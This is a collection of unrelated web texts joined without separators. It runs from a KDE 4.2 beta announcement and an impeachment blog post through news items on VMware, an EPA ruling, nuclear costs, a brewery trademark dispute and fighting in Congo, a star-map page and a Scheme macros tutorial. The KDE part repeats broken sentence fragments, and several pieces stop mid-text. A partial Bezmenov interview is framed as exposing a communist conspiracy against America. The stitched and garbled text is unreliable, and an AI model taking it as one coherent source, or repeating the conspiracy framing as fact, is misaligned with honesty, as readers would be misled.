A find - as - you - type bar improves navigation in webpages .
KMail has a powerful and attractive message header list , and reworked attachment view .
, and reworked attachment view .
The KWrite and Kate text editors can now operate in Vi input mode , accomodating those used to the traditional UNIX editor .
PowerDevil , the new KDE4 power management infrastructure brings a modern , integrated tool for controlling various aspects of mobile devices .
Ark , the archiving tool has improved UI , gained support for password - protected archives and is accessible via a context menu from the file managers now .
from the file managers now .
A new printing configuration system brings back a number of features users have been missing in KDE 4.0 and 4.1 .
The components " printer - applet " and " system - config - printer " are shipped with the kdeadmin and kdeutils module .
brings back a number of features users have been missing in KDE 4.0 and 4.1 .
The components " printer - applet " and " system - config - printer " are shipped with the kdeadmin and kdeutils module .
KRDC , the remote desktop client improves support for Microsoft 's Active Directory through LDAP .
through LDAP .
Kontact has gained a new planner summary and support for drag and drop in the free / busy view .
and support for drag and drop in the free / busy view .
KSnapshot now uses the window title when saving screenshots , making it easier to index them using search engines .
The secure file transfer protocols SFTP and FISH are now also supported by KDE on the Windows platform .
. Killbots is a new game shipped with the kdegames module .
Other games have improved user interaction and added themes and levels .
Educational apps such as KAlgebra , KStars , KTurtle and Parley have seen major improvements in UI and feature sets .
Okteta , the hex editor has significantly improved various aspects of its user interface .
Improved Desktop Grid Effect Improved Desktop Grid Effect
This list of new features in KDE 4.2 is not comprehensive yet .
Please refer to the feature plan for more details .
To find out more about the KDE 4 desktop and applications , please also refer to the KDE 4.1.0 and KDE 4.0.0 release notes .
KDE 4.2 Beta 1 is not recommended for everyday use .
This beta will be followed up by another beta on December 16th , a release candidate on January 6th and the final release of KDE 4.2.0 on January 27th , 6 months after the release of KDE 4.1.0 .
Installing KDE 4.2 Beta 1 Binary Packages
Packagers .
Some Linux / UNIX OS vendors have kindly provided binary packages of KDE 4.2 Beta 1 , and in other cases community volunteers have done so .
Some of these binary packages are available for free download via the KDE 4.2 Beta 1 Info Page .
Additional binary packages , as well as updates to the packages now available , may become available over the coming weeks .
Package Locations .
For a current list of available binary packages of which the KDE Project has been informed , please visit the KDE 4.2 Beta 1 Info Page .
Compiling KDE 4.2 Beta 1
The complete source code for KDE 4.1.80 may be freely downloaded .
Instructions on compiling and installing KDE 4.1.80 are available from the KDE 4.2 Beta 1 Info Page .
About KDE
KDE is an international technology team that creates free and open source software for desktop and portable computing .
Among KDE 's products are a modern desktop system for Linux and UNIX platforms , comprehensive office productivity and groupware suites and hundreds of software titles in many categories including Internet and web applications , multimedia , entertainment , educational , graphics and software development .
KDE software is translated into more than 60 languages and is built with ease of use and modern accessibility principles in mind .
KDE 's full - featured applications run natively on Linux , BSD , Solaris , Windows and macOS .
Trademark Notices .
KDE ® and the K Desktop Environment® logo are registered trademarks of KDE e.V. Linux is a registered trademark of Linus Torvalds .
UNIX is a registered trademark of The Open Group in the United States and other countries .
All other trademarks and copyrights referred to in this announcement are the property of their respective owners .
Press Contacts
For more information send us an email :
press@kde.org
After spending over 6 hours last Friday in front of my computer at work riveted to the stage set by the House Judiciary Committee players holding a meeting entitled Executive Power and Its Constitutional Limitations , impeachment - lite as Republican Congressman Lundgren called it , or whatever else it is referred to , I had such a headache , and was extremely depressed .
I watched , possibly jeopardizing my job , intently hoping and waiting for Chair John Conyers to gain a backbone at age 79 .
I saw many of my activist friends sitting in rows behind the star witnesses like Rep. Dennis Kucinich , former Representative Elizabeth Holtzman , who served on the Judiciary Committee overseeing the Nixon impeachment , and who I had the privilege to work for when she was NYC Comptroller , and Bruce Fein , both of whom would n’t back down from the issue of impeachment .
In fact , Holtzman said she was there to spell out the primary reasons for impeachment .
And that the responsibility to deal with impeachment is sad , but it can not be shrugged off .
There were disruptions , and Conyers pandered to the war - mongering republicans by throwing out people who applauded the witnesses .
However , to his credit , he let the scene play out .
I kept yelling at my computer , people around me thinking I had really lost my mind , but I wanted those congress members to LISTEN to what Liz was saying .
There is no remedy other than impeachment !
They kept asking for other suggestions , only to be told , and with great frustration by Liz and Bruce Fein , the only way out of this mess IS impeachment .
Conyers looked like he needed a shot of adrenaline , and Nadler looked very pensive , as if there was some silver bullet he was missing .
So in my estimation this committee wasted the taxpayer ’s money upwards of $ 300,000 just for them sitting there for 6 hours and doing nothing .
Figure the cost of what they are getting paid , maybe 10 in the room at a time , and you do the math .
So over ¼ million dollars was just spent to “ think ” about impeachment .
Not to mention that during those 6 hours , hundreds of more Iraqi ’s were killed , as well as who knows how many Afghani citizens , as well as troops .
But these esteemed members need a reason .
Want one ?
Here it is .
My son , Sgt. James Brower , USMC Reserves , NYPD police officer , which is his regular job , has received redeployment orders .
This will be his THIRD tour of duty .
I quote from the original orders I now have in my possession since he will be leaving shortly for Baghdad :
TO : Sergeant James W. Brower
SUBJ : ORDERED TO ACTIVATION - PARTIAL MOBILIZATION
You have been involuntarily ordered to active duty from your residence in support of the national emergency declared under Presidential Proclamation 7463 of 14 September 2001 and as prescribed in Executive Order 13223 .
Under the provisions of Title 38 , US Code , Section 4312 ( c ) ( 4 ) ( A ) and ( B ) this period of active duty is exempt from the five - year cumulative service limitation on reemployment rights under Title 38 , US Code , Chapter 43 .
Your period of active duty is pursuant to US Code Title 10 , Section 12302 .
You are assigned to activation , in support of PFO – Operation Iraqi Freedom , on such a date that will enable you to report to the commanding officer .
Period of Duty : 17 May 2008 to 20 June 2009 for 400 days .
So upon doing some research I found that Proclamation 7463 – Declaration of National Emergency by Reason of Certain Terrorist Attacks , was signed by the President 3 days after the attacks of 9/11 .
In part it reads :
“ A national emergency exists by reason of the terrorist attacks at the World Trade Center , New York , New York and the Pentagon , and the continuing and immediate threat of further attacks on the United States .
NOW , THEREFORE , I , GEORGE W. BUSH , President of the Unites States of America , by virtue of the authority vested in me as President by the Constitution and the laws of the United States , I hereby declare that the national emergency has existed since September 11 , 2001 , and , pursuant to the National Emergencies Act , I intend to utilize the following statutes … ”
The National Emergencies Act ( 50 U.S.C. 1601 - 1651 ) is a United States federal law passed in 1976 to stop open - ended states of national emergency and formalize Congressional checks and balances on Presidential emergency powers .
The act sets a limit of two years on states of national emergency .
It also imposes certain " procedural formalities " on the President when invoking such powers , and provides a means for Congress to countermand a Presidential declaration of emergency and associated use of emergency powers .
Next Page 1 | 2
( Note : You can view every article as one long page if you sign up as an Advocate Member , or higher ) .
The latest survey on college presidents ' pay showed most of their salaries continue to climb , as families struggle to cover tuition bills and congressional leaders scrutinize higher - education finances .
Some of the largest increases lately have been at public universities , according to the annual pay survey by the Chronicle of Higher Education , a trade magazine .
For ...
After targeting the market for virtualizing servers and clients , VMware has now set its sights on mobile phones , announcing Mobile Virtualization Platform ( MVP ) on Monday .
The company will work closely with mobile phone vendors to embed its virtualization technology directly onto mobile phones , as an extra layer that decouples the applications and data from the underlying hardware , according to Fredrik Sj ö stedt , director of products for VMware in EMEA .
VMware so far is keeping the names of vendors it is working with under wraps .
It aims to have the first phones available by the end of next year or the beginning of 2010 , according to Sj ö stedt .
Enterprise users who pick a phone with embedded support for virtualization will , for example , be able to run multiple operating systems or multiple profiles -- for example , one for personal use and one for work use -- on the same phone .
The IT department will able to set up one profile that follows all the policies necessary to keep the enterprise secure , but at the same time end users can run anything they like on their personal profile , according to Sj ö stedt .
Users will also be able to more easily move personal data and files -- including applications , pictures , videos , music and e-mail -- to a new device , making the upgrade to a new phone less painful .
Part of the VMware plan is to make mobile phones just another part of its management infrastructure , no different than a server or a PC .
" Without management everything falls flat , " said Sj ö stedt .
The use of virtualization will also let phone vendors add new software faster than before , according to VMware .
They can use the same software stack , including operating system and applications , on a wide variety of phones without having to worry about the underlying hardware differences , according to VMware .
That is , of course , for the phones that support virtualization .
The platform is based on technology VMware acquired from Trango Virtual Processors in October , and has been optimized to run efficiently on low power consuming and memory constrained mobile phones .
Supported operating systems today include Windows CE , Symbian and Linux , according to VMware .
[ social_buttons ]
Huh , maybe a clean energy future does lie ahead .
The Environmental Protection Agency ’s Environmental Appeals Board ( EAB ) ruled today that the EPA had no valid reason for refusing to limit from new coal - fired power plants the carbon dioxide emissions that cause global warming .
The board sided with the Sierra Club and found that since Massachusetts v EPA Supreme ruled that Carbon Dioxide is a pollutant under the Clean Air Act , new coal - fired power plants must implement Best Available Technology for controlling CO2 .
What ?
The EPA cannot refuse to protect the environment ?
Awesome !
This decision means that all new and proposed coal plants nationwide must readdress their carbon dioxide emissions .
“ Today ’s decision opens the way for meaningful action to fight global warming and is a major step in bringing about a clean energy economy , ” said Joanne Spalding , Sierra Club Senior Attorney who argued the case .
“ This is one more sign that we must begin repowering , refueling and rebuilding America . ”
The EAB shot down every lame Bush excuse for failing to regulate what is the largest source of greenhouse gases in the United States .
This should make things easier for when Obama takes over – and am I the only person that wants that to happen … like now ?
According to the Sierra Club , coal emits 30 % of our nation ’s global warming pollutants .
And this was an issue , why ?
“ Everyone has a role to play and it ’s time that the coal industry did its part and started living up to its clean coal rhetoric , ” Bruce Nilles , Director of the Sierra Club ’s National Coal Campaign , went on to say .
Source : Sierra Club | Image : Jan Tik on Flickr under Creative Commons
( There is a huge line of customers waiting on their drinks .
An impatient customer who just placed his order assumes the next drink is his and takes it , after I call someone else ’s name . )
Customer : “ This is n’t hot chocolate . ”
Me : “ That ’s because you grabbed someone else ’s drink . ”
Customer : “ But it is n’t hot chocolate ! ”
Me : “ There are nine people in front of you waiting for drinks .
You grabbed the wrong drink . ”
Customer : “ But it is n’t hot chocolate . ”
( I look at the order screen for the name on the drink he took . )
Me : “ Is your name [ Other Customer ] ? ”
Customer : “ No , and this is n’t hot chocolate ! ”
Me : “ That ’s because you took [ Other Customer ] ’s drink ! ”
Customer : “ It ’s not hot chocolate ! ”
Me : “ Hand me the drink and I will remake the person whose drink you took .
I ’ll make your hot chocolate , but it will take a few minutes ! ”
( The customer hands the drink back to me . )
Customer : “ It ’s not hot chocolate ! ”
Excerpts from " Yuri Bezmenov on demoralization " Interview with Yuri Bezmenov ( ex - KGB ) by Edward Griffin - 1984
This shocking video transcription exposes KGB 's subversive tactics against western society .
In this interview , Yuri Bezmenov explains how Marxist ideology is deconstructing America 's values , destabilizing the economy , and provoking crises in order to sovietize the free world .
Some of the videos below are from different portions of the same interview .
( We removed the earlier links to Youtube since they no longer worked ) Yuri Bezmenov on demoralization Bezmenov on Marxists , useful idiots Bezmenov on American mass media Bezmenov on KGB interest in yoga , brainwashing Partial Transcript : ED GRIFFIN :
Well , you spoke before about " ideological subversion " and that 's a phrase that I 'm afraid some Americans do n't understand .
When the Soviets use the phrase " ideological subversion " what do they mean by it ?
1. YURI BEZMENOV : Ideological subversion is the process which is legitimate and open .
You can see it with your own eyes ....
It has nothing to do with espionage .
I know that intelligence gathering looks more romantic ....
That 's probably why your Hollywood producers are so crazy about James Bond types of films .
But in reality the main emphasis of the KGB is NOT in the area of intelligence at all .
According to my opinion , and the opinions of many defectors of my caliber , only about 15 % of time , money , and manpower is spent on espionage as such .
The other 85 % is a slow process which we call either ideological subversion , active measures , or psychological warfare .
What it basically means is : to change the perception of reality of every American that despite of the abundance of information no one is able to come to sensible conclusions in the interest of defending themselves , their families , their community , and their country .
It 's a great brainwashing process which goes very slow and is divided into four basic stages .
The first one being " demoralization " .
It takes from 15 to 20 years to demoralize a nation .
Why that many years ?
Because this is the minimum number of years required to educate one generation of students in the country of your enemy exposed to the ideology of [ their ] enemy .
In other words , Marxism - Leninism ideology is being pumped into the soft heads of at least three generation of American students without being challenged or counterbalanced by the basic values of Americanism ; American patriotism ....
The result ?
The result you can see ... the people who graduated in the 60's , dropouts or half - baked intellectuals , are now occupying the positions of power in the government , civil service , business , mass media , and educational systems .
You are stuck with them .
You can't get through to them .
They are contaminated .
They are programmed to think and react to certain stimuli in a certain pattern [ alluding to Pavlov ] .
You can not change their mind even if you expose them to authentic information .
Even if you prove that white is white and black is black , you still can not change the basic perception and the logic of behavior .
In other words [ for ] these people the process of demoralization is complete and irreversible .
To rid society of these people you need another 15 or 20 years to educate a new generation of patriotically minded and common sense people who would be acting in favor and in the interests of United States society .
ED :
And yet these people who have been programmed and as you say [ are ] in place and who are favorable to an opening with the Soviet concept - these are the very people who would be marked for extermination in this country ?
YURI : Most of them , yes .
Simply because the psychological shock when they will see in [ the ] future what the beautiful society of EQUALITY and social justice means in practice , obviously they will revolt .
They will be very unhappy [ and ] frustrated people , and Marxist - Leninist regime does not tolerate these people .
Obviously they will join the [ ranks ] of dissenters ; dissidents .
Unlike the present United States there will be no place for dissent in future Marxist - Leninist America .
[ Now ] you can get popular like Daniel Elsburg and filthy rich like Jane Fonda for being a dissident [ and ] for criticizing your Pentagon .
In [ the ] future these people will simply be [ he makes a squishy noise ] squashed like cockroaches for criticizing the government .
Nobody is going to pay them nothing for their beautiful [ and ] noble ideas of EQUALITY .
This they do n't understand and it will be the greatest shock for them , of course .
The demoralization process in the United States is basically completed already for the last 25 years .
Actually , it 's over fulfilled because demoralization now reaches such areas where not even Comrade Andropov and all his experts would even dream of such tremendous success .
Most of it is done by Americans to Americans thanks to lack of moral standards .
As I mentioned before , exposure to true information does not matter anymore .
A person who was demoralized is unable to assess true information .
The facts tell nothing to him , even if I shower him with information , with authentic proof , with documents and pictures .
... he will refuse to believe it ....
That 's the tragedy of the situation of demoralization .
The next stage is destabilization ....
It only takes 2 to 5 years to destabilize a nation .
This time what matters is essentials ; economy , foreign relations , [ and ] defense systems .
And you can see it quite clearly that in some ... sensitive areas such as defense and [ the ] economy , the influence of Marxist - Leninist ideas in the United States is absolutely fantastic .
I could never believe it 14 years ago when I landed in this part of the world that the process will go that fast .
Most of the American politicians , media , and educational system train another generation of people who think they are living at the peacetime .
False .
United States is in a state of war ; undeclared , total war against the basic principles and foundations of this system .
And the initiator of this war is not Comrade Andropov of course - it 's the system .
However , ridiculous it may sound , [ it is ] the world Communist system , or the world Communist conspiracy .
Whether I scare some people or not , I do n't give a hoot .
If you 're not scared by now , nothing can scare you .
ED : Okay , so what do we do ?
What is your recommendation to the American people ?
YURI : Well , the immediate thing that comes to mind is , of course , there must be a very strong national effort to educate people in the spirit of REAL patriotism , number one .
Number two , to explain [ to ] them the real danger of socialist , communist , welfare state , Big Brother government ....
The moment at least part of [ the ]
United States population is convinced that the danger is real , they have to FORCE their government ... to stop aiding Communism .
A spatial representation of every star within 14 light - years of the Solar System in orthographic projection .
There are 32 stars in this region , including the Sun .
The stars are colored according to the spectral type , which may not reflect the actual color .
Please see this Wikipedia article for the listing of stars .
The stars on this map may not all be visible to the naked eye , as many are dwarf stars .
Some of this information may be preliminary and not entirely accurate as a result .
Each grid square represents 1 square light year .
The grid is aligned to the ecliptic .
Planets are not shown on this map because they orbit stars at a relatively small distance .
They would be indistinguishable at this scale .
Unless noted otherwise all star data is ment relative to the Sun ( " Mass : 1.25 " means 125 % of the Sun 's mass ) .
Move the mouse while holding the button to rotate the map .
Use the scroll wheel to zoom in and out .
Move the cursor over a star to display information .
Click on a star to visit its Wikipedia entry .
If the application does n't work , you might need to install the newest Adobe Flash Player plugin ( at least Version 9 is required ) .
Click here to see a similar map of the contellation of Leo .
This application was inspired by this map by the wikipedia contributor Inductiveload .
If you have comments or suggestions , visit my Blog .
Visit http://www.krystian.de for more of my works .
THE REPUBLICAN convention was a barren desert of diversity , with the lowest percentage of black delegates in 40 years .
Yet this 93 percent white gathering blithely stole from the race riots of the ' 60s to lustily chant " Drill , baby , drill . "
Compounding the irony , the first speaker hurling the verbal Molotov cocktail to the crowd was the only African - American the party could dredge up for prime - time , former Maryland lieutenant governor Michael Steele .
The chant continued during confused chuckles by former New York City mayor Rudy Giuliani and through assertive proclamations of laying more pipelines and building more nuclear plants by vice presidential nominee Sarah Palin .
Alaska 's governor would drill in the Arctic National Wildlife Refuge and opposes protection for polar bears as the ice cap melts .
The oil chant rose up one last time when presidential nominee John McCain said , " We will drill new wells offshore and we will drill them now . "
Anyone with half a carbon atom in their brain knows it makes no difference that McCain and Palin threw in lame promises to develop wind and solar power .
You did not hear , " Blow , baby , blow , " or " Let the sun shine in . "
The looting was on in the Republican ghetto that has told the world for eight years , " Burn , baby , burn . "
Most notably , McCain wants 45 new nuclear power plants by 2030 .
Put aside the obvious fact that no one wants nuclear waste in their backyard .
The currently planned national dump in Nevada , Yucca Mountain , is nowhere close to opening because of opposition led by Senate majority leader Harry Reid .
Whatever energy relief could come from nuclear generation , the cost is a mushroom cloud .
The Department of Energy recently announced that the estimated cost of dealing with the waste of existing nuclear power plants has risen in the last seven years from a prior guess of $ 57.5 billion to $ 96.2 billion .
In trying to put his best face on this recalculation , Ward Sproat , the department 's civilian nuclear waste director , said , " It 's not all taxpayer money . "
He said 80 percent of the cost will come from nuclear ratepayers .
" I would argue pretty strenuously the cost of doing nothing is a lot higher . "
Asked whether a surge in new plants would require a new repository , Sproat said , " If there 's a major nuclear renaissance with a very large number - you know , a large number of new plants in the future , the second repository may - and I 'm underlining the word ' may ' - be needed . "
The cost of plants is even more of a plume , for both taxpayers and ratepayers .
Last week for example , Progress Energy Florida announced a proposed rate increase of 31 percent , in part to pay for two new nuclear reactors , which will cost an estimated $ 17 billion .
The Orlando Sentinel reported that the nuclear project is " an enormous investment likely to bring annual rate hikes for nearly a decade . "
Florida Power &
Light followed up this week with a proposed 7 percent increase , also in part because of expansion and construction of nuclear plants .
The Wall Street Journal has reported that the estimated cost of nuclear reactors has doubled , tripled , or quadrupled in recent years to an average ranging between $ 5 billion to $ 12 billion per plant .
It quoted an official of Moody 's Investors Service as saying such costs " have blown by our highest estimate . "
According to the Chicago Tribune , Moody 's likens the underestimating of nuclear plant costs by utilities to pricing a house without the appliances , furnishings , and landscaping .
The only way to furnish this empty house is through massive taxpayer subsidies .
The once - moribund US nuclear industry has been reenergized from $ 13 billion in federal subsidies and $ 20.5 billion in loan guarantees in recent years .
But the industry wanted $ 50 billion in guarantees .
That ought to be a sign of the risk , let alone the waste .
America 's ghettos never recovered from " Burn , baby , burn . "
Between " Drill , baby drill " and " Nuke , baby nuke , " earth faces a riot on resources from which the planet may never recover .
Derrick Z. Jackson can be reached at jackson@globe.com .
© Copyright 2008 Globe Newspaper Company .
It was Brooklyn versus the Trappist monks — and Brooklyn blinked .
Last year , the Brooklyn Brewery began producing a refermented ale called Brooklyn Local 1 , borrowing a method perfected in the Trappist abbeys of Belgium .
Steve Hindy , the president and cofounder of the brewery , said he and the brewmaster , Garrett Oliver , “ had always been fascinated by Belgian - style beers and knew we could produce them here ” — here being North 11th Street , within sight of the Williamsburg waterfront .
In the eight - week process , the ale comes out of fermentation tanks flat and is allowed to ferment again in the bottle .
Working with his longtime designer , Milton Glaser , Mr. Hindy came up with an amber bottle design featuring a double embossed ring at the base of the neck .
It was not unlike the single - ringed bottle used by the Westmalle Abbey in Belgium and by the New Belgium Brewing Company of Fort Collins , Colo .
But it was not so much like the older design that Mr. Hindy discerned any potential problem .
Until Kim Jordan of New Belgium , an old friend , picked up the phone a few months later .
“ Why did n’t you call me before coming out with this bottle ? ” he recalled her asking .
She explained that she had been through protracted negotiations with the monks of Westmalle on the use of a ringed bottle in the United States .
The result was the creation of a joint venture whose purpose was to own and control the ringed bottle trademark in this country .
While Ms. Jordan was reluctant to sue Mr. Hindy , she told him it was her duty under the partnership to defend the trademark .
Mr. Hindy , already involved in trademark litigation of his own , concluded , “ One of those suits is plenty . ”
He agreed to abandon the double rings and to redesign the bottles , which are made in Germany , at a cost of about $ 60,000 for new molds .
The brewery started shipping out the ring - free bottles this fall .
With the episode behind him , Mr. Hindy is now prepared to concede the monks ’ strategic advantage .
“ God is on their side , ” he said .
( CNN ) -- Congolese rebels seized a major military camp and a spacious gorilla park in a renewed bout of heavy fighting that sent thousands fleeing , according to the United Nations and park officials .
Young gorillas play in Congo 's Virunga Park , which was taken over Sunday by rebels fighting army forces .
The fighting comes after a tenuous week - old U.N. brokered cease - fire between rebels and government forces fell apart Sunday .
Fighting between the rebels under renegade Gen. Laurent Nkunda and Congolese army regulars in the eastern province of North Kivu of the Democratic Republic of the Congo displaced thousands of civilians , according to U.N. spokesman Michele Bonnardeaux .
The rebels also seized the headquarters of Virunga National Park in eastern Congo after intense fighting with the Congolese army , according to a statement by park officials .
The rebels have used Virunga Park as a base but have never seized its headquarters before .
The 3,000 square mile ( 7,800 square kilometer ) park has a gorilla facility and is home to 200 of the 700 endangered mountain gorillas in existence .
Do n't Miss Congo's Virunga National Park Web site
Congo's Virunga National Park Web site U.N. : Recent Congo fighting uproots 200,000
" Over 50 rangers were forced to flee into the forests and abandon the park station , in fear of their lives , " the park statement said .
" They have seized the entire gigantic infrastructure [ of the park headquarters ] which is stategically very close to the main road heading north into Goma , " said park spokeswoman Samantha Newport by phone from Goma , about 40 kilometers from the fighting .
" The situation is eastern Congo is very dangerous , " she said .
" It 's the first time they 've [ rebels ] ever had the audacity " to take over the park .
Watch as park ranger describes the violence as it explodes behind him »
Newport said the rebels have set up roadblocks so the rangers are making their way through woods south to safety .
She said the gorillas and other wildlife in the park are in danger of getting caught in the crossfire .
A park ranger described the takeover .
" When the rebels started approaching the park station we thought we were all going to be killed , " said Park Ranger Bareke Sekibibi , 29 , who spoke by cell phone from the forest earlier as he fled , according to the park statement .
" We are not military combatants , we are park rangers protecting Virunga 's wildlife . "
Although the civil war in the Congo officially ended in 2003 , recent fighting in eastern Congo between government forces and rebels has caused tens of thousands to flee their homes
The conflict and humanitarian crisis in Congo have taken the lives of some 5.4 million people since 1998 , and that 45,000 people continue to die there every month , according to an International Rescue Committee report in January .
All About Democratic Republic of the Congo • Goma • International Rescue Committee
The Explorer
The Adventures of a Pythonista in Schemeland/10
by Michele Simionato
November 1 , 2008
Summary
Yet another episode fully devoted to macros .
I will discuss introspection , guarded patterns , literal identifiers , and a couple of common beginner 's mistakes .
Advertisement
syntax - match and introspection features of sweet - macros
In the last episode I have defined a very simple multi- define macro by using my own sweet - macros framework .
I have also claimed that sweet macros provides introspection facilities , but I have not shown them .
Here I will substain my claim .
First of all , let me show how you can get the patterns accepted by multi-define : > ( multi- define < patterns > ) ( ( multi - define ( name ... ) ( value ... ) ) )
Since multi-define is a simple macro it accepts only a single pattern .
However , it is possible to define macros with multiple patterns by relying on the second form of def-syntax , i.e. ( def- syntax name transformer ) where the transformer is a procedure which is typically built on top of syntax - match .
For instance , suppose we wanted to extend multi-define to work also as a replacement of define , i.e. suppose we want to accept the pattern ( multi - define name value ) where name is an identifier .
Here is how to do that by using syntax - match : ( def- syntax multi - define2 ( syntax - match ( ) ( sub ( ctx ( name ... ) ( value ... ) ) #'( begin ( define name value ) ... ) ) ( sub ( ctx name value ) #'( define name value ) ) ) ) syntax - match recognizes the literal identifier sub as an expected keyword when it appears in the right position , i.e. at the beginning of each clause .
sub is there for two reasons : in my opinion it makes the code more readable : you should read a clause ( sub pattern skeleton ) as " substitute a chunk of code matching the pattern with the code obtained by expanding the pattern variables inside the skeleton " ; it makes syntax - match look different from syntax - case and syntax - rules , which is fine , since syntax - match is a little different from the Scheme standard macro systems .
The identifier ctx that you see as first element of each pattern denotes the context of the macro , a concept that I will explain in a future installment ; you can use any valid identitier for the context , including the name of the macro itself - that is a common convention .
If you are not interested in the context ( which is the usual case ) you can discard it and use the special identifier _ to make clear your intent .
I leave as an exercise to check that if you invert the order of the clauses the macro does not work : you must remember to put the most specific clause first .
In general you can get the source code for all the macros defined via def-syntax and syntax - match .
For instance , the source code ( of the transformer ) of our original multi-define macro is the following : > ( multi - define < source > ) ( syntax - match ( ) ( sub ( multi - define ( name ... ) ( value ... ) ) #'( begin ( define name value ) ... ) ) )
As you see , for better readability def-syntax use the name of the macro for the context , but any name would do .
I have not explained everything there is to know about syntax - match , but we need to leave something out for the next episode , right ?
A couple of common mistakes
If you try to write macros of your own , you will likely incur in mistakes .
I think it is worth warning my readers about a couple of such common mistakes .
The first one is forgetting the begin for macros expanding to multiple expressions .
For instance , you could be tempted to write multi-define as follows : > ( def-syntax ( multi - define - wrong ( name ... ) ( value ... ) ) #'( ( define name value ) ... ) )
If you try to use this macro , you will get an exception : > ( multi- define - wrong ( a ) ( 1 ) )
Unhandled exception Condition components : 1 . &who : define 2 . &message : " a definition was found where an expression was expected " 3 . &syntax : form : ( define a 1 ) subform : #f
The problem is that Scheme interprets a pattern of the form ( func arg ... ) as a function application , but in this case func is the definition ( define a 1 ) which is certainly not an function , it is not even an expression !
Actually , R6RS Scheme distinguishes definitions from expressions , a little bit like in other languages statements are distinguished from expressions , except that in Scheme there are no statements other than definitions .
You will get exactly the same error if you try to print a definition ( display ( define a 1 ) ) : since a definition does not return anything , you can not print it .
A second common mistake is to forget the sharp - quote #' .
If you forget it - for instance if you write ( begin ( define name value ) ... ) instead of #'( begin ( define name value ) ... ) - you will get a strange error message : reference to pattern variable outside a syntax form .
To understand the message , you must understand what a syntax form is .
That requires a rather detailed explanation that I will leave for a future episode .
For the moment , be content with a simplified explanation .
A syntax form is a special type of quoted form : just as you write ' ( some expression ) or ( quote ( some expression ) ) to keep unevaluated a block of ( valid or invalid ) Scheme code , you can write #'( some expression ) or ( syntax ( some expression ) ) to denote a block of ( valid or invalid )
Scheme code which is intended to be used in a macro and contains pattern variables .
Pattern variables must always be written inside a syntax expression , so that they can be replaced with their right values when the macro is expanded at compile time .
Note : R6RS
Scheme requires the syntax #'x to be interpreted as a shortcut for ( syntax x ) ; however there are R5RS implementation that do not allow the #'x syntax or use a different meaning for it .
In particular , that was the case for old versions of Chicken Scheme .
If you want to be fully portable you should use the extended form ( syntax x ) .
However , all the code in this series is intended to work on R6RS Schemes , therefore I will always use the shortcut notation #' which in my opinion is ways more readable .
Guarded patterns
There are a few things I did not explain when introducing the multi-define macro .
For instance , what happens if the number of the identifiers does not match the number of the values ?
Of course , you get an error : > ( multi - define ( a b c ) ( 1 2 ) ) Unhandled exception Condition components : 1 . &assertion 2 . &who : ... 3 . &message : " length mismatch " 4 . &irritants : (( #<syntax 1 > # < syntax 2 > ) ( # < syntax a > #< syntax b> #< syntax c > ) )
The problem is that the error message is a bit scary , with all those #< syntax > things .
How do we get an error message which is less scary to the newbie ?
Answer : by using the guarded patterns feature of sweet - macros !
Here is an example : ( def- syntax ( multi - define ( name ... ) ( value ... ) ) ; the pattern #'( begin ( define name value ) ... ) ; the skeleton ( = ( length #'( name ... ) ) ( length #'( value ... ) ) ) ; the guard ( syntax - violation ' multi - define " Names and values do not match " #'(( name ... ) ( value ... ) ) ) )
The line ( = ( length #'( name ... ) ) ( length #'( value ... ) ) ) is the guard of the pattern ( multi - define ( name ... ) ( value ... ) ) .
The macro will expand the patterns in the guard into lists at compile time , then it will check that the number of names matches the number of values ; if the check is satified then the skeleton is expanded , otherwise a syntax - violation is raised ( i.e. a compile time exception ) with a nice error message : > ( multi - define ( a b c ) ( 1 2 ) ) Unhandled exception : Condition components : 1 . &who : multi-define 2 . &message : " Names and values do not match " 3 . &syntax : form : ( ( a b c ) ( 1 2 ) ) subform : #f Because of their working at compile time , guarded patterns are an ideal tool to check the consistency of our macros ( remember : it is very important to check for errors as early as possible , and the earliest possible time is compile time ) .
Literal identifiers Guarded patterns can also be ( ab) used to recognize keyword - like identifiers in a macro .
For instance , here is how you could implement the semantics of the for loop discussed in episode # 8 with a macro ( notice how all the funny characters ' , @` disappeared ) : ( def - syntax ( for i from i0 to i1 action ... ) #'( let loop ( ( i i0 ) ) ( unless ( >= i i1 ) action ... ( loop (+ i 1 ) ) ) ) ( and ( eq ? ( syntax - > datum #' from ) ' from ) ( eq ? ( syntax - > datum #'to ) ' to ) ) )
Here the R6RS primitive syntax -> datum is used to convert the syntax objects #' from and #'to into regular Scheme objects so that they can be compared for equality with the literal identifiers ' from and ' to .
You can check that the macro works by trying to use a wrong syntax .
For install if you mispell from as fro you will get a syntax error at compilation time : > ( for i fro 1 to 5 ( display i ) ) Unhandled exception : Condition components : 1 . &message : " invalid syntax " 2 . &syntax : form : ( for i fro 1 to 5 ( display i ) ) subform : #f Notice that this is an abuse of guarded patterns , since syntax - match provides a built - in mechanism just for that purpose .
Moreover this macro is subject to the multiple evaluation problem which I will discuss in the next episode : thus I do not recommend it as an example of good style when writing macros .
Still , I have written it here to compare it with the approach in episode # 8 : with this macro I have been able to extend the Scheme compiler for within , with just a few lines of code : that is much simpler than writing an external compiler as a preprocessor , as I planned to do before .
As I said , syntax - match has the built - in capability of recognizing literal identifiers in the patterns as if they were keywords .
This is what the empty parenthesis are for .
If you write ( syntax - match ( lit ... ) clause ... ) the identifiers listed in ( lit ... ) will be treated as literal identifiers in the macro scope .
Literal identifiers can be used to enhance readability , or to define complex macros .
For instance our for macro can be written without need for guarded patterns as : ( def- syntax for ( syntax - match ( from to ) ( sub ( for i from i0 to i1 action ... )
#'( let loop ( ( i i0 ) ) ( unless ( >= i i1 ) action ... ( loop (+ i 1 ) ) ) ) ) ) )
You can even introspect the literal identifiers recognized by syntax - match : > ( for < literals > ) ( from to )
Let me close this paragraph by suggesting an exercise in macrology .
Try to implement a Python - like for loop working as in the following examples : > ( for x in ' ( 1 2 3 ) ( display x ) ) 123 > ( for ( x y ) in '( (a b ) ( A B ) ( 1 2 ) ) ( display x ) ( display y ) ) a bAB12 Clearly it should work for a generic number of arguments and in should be treated as a literal identifier .
I will give the solution in episode 12 , so you will have some time to play .
Have fun !
Talk Back !
Have an opinion ?
Readers have already posted 5 comments about this weblog entry .
Why not add yours ?
RSS Feed
If you 'd like to be notified whenever Michele Simionato adds a new entry to his weblog , subscribe to his RSS feed .
About the Blogger
Michele Simionato started his career as a Theoretical Physicist , working in Italy , France and the U.S.
He turned to programming in 2003 ; since then he has been working professionally as a Python developer and now he lives in Milan , Italy .
Michele is well known in the Python community for his posts in the newsgroup (s ) , his articles and his Open Source libraries and recipes .
His interests include object oriented programming , functional programming , and in general programming metodologies that enable us to manage the complexity of modern software developement .
This weblog entry is Copyright © 2008 Michele Simionato .
All rights reserved .
